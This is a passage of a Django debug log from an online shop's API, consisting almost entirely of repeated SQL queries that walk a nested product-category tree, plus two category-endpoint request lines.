"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 12:47:31,173 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 12:47:31,175 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 12:47:31,177 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 12:47:31,179 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 12:47:31,182 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 12:47:31,185 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 12:47:31,187 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 12:47:31,189 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 12:47:31,192 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 12:47:31,194 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 12:47:31,198 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 12:47:31,200 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 12:47:31,203 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 12:47:31,206 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 12:47:31,208 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 12:47:31,210 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 12:47:31,214 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 12:47:31,216 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 12:47:31,219 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 12:47:31,222 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 12:47:31,225 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 12:47:31,228 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 12:47:31,231 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 12:47:31,233 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 12:47:31,235 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 12:47:31,237 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 12:47:31,241 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 12:47:31,244 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 12:47:31,246 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 12:47:31,249 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 12:47:31,251 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 12:47:31,253 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 12:47:31,256 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 12:47:31,258 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 12:47:31,260 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 12:47:31,263 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 12:47:31,265 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 12:47:31] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 12:47:32,861 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 12:47:32,869 utils 20136 140506432534272 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-16 12:47:32,875 utils 20136 140506667599616 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 12:47:32,879 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 12:47:32,882 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 12:47:32,885 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [16/Dec/2019 12:47:32] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-16 12:47:32,889 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 12:47:32,894 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 12:47:32,898 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 12:47:32,902 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 12:47:32,907 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 12:47:32,913 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 12:47:32,917 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 12:47:32,921 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 12:47:32,924 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 12:47:32,926 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 12:47:32,930 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 12:47:32,933 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 12:47:32,935 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 12:47:32,938 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 12:47:32,940 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 12:47:32,945 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 12:47:32,948 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 12:47:32,950 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 12:47:32,953 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 12:47:32,955 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 12:47:32,958 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 12:47:32,962 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 12:47:32,964 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 12:47:32,967 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 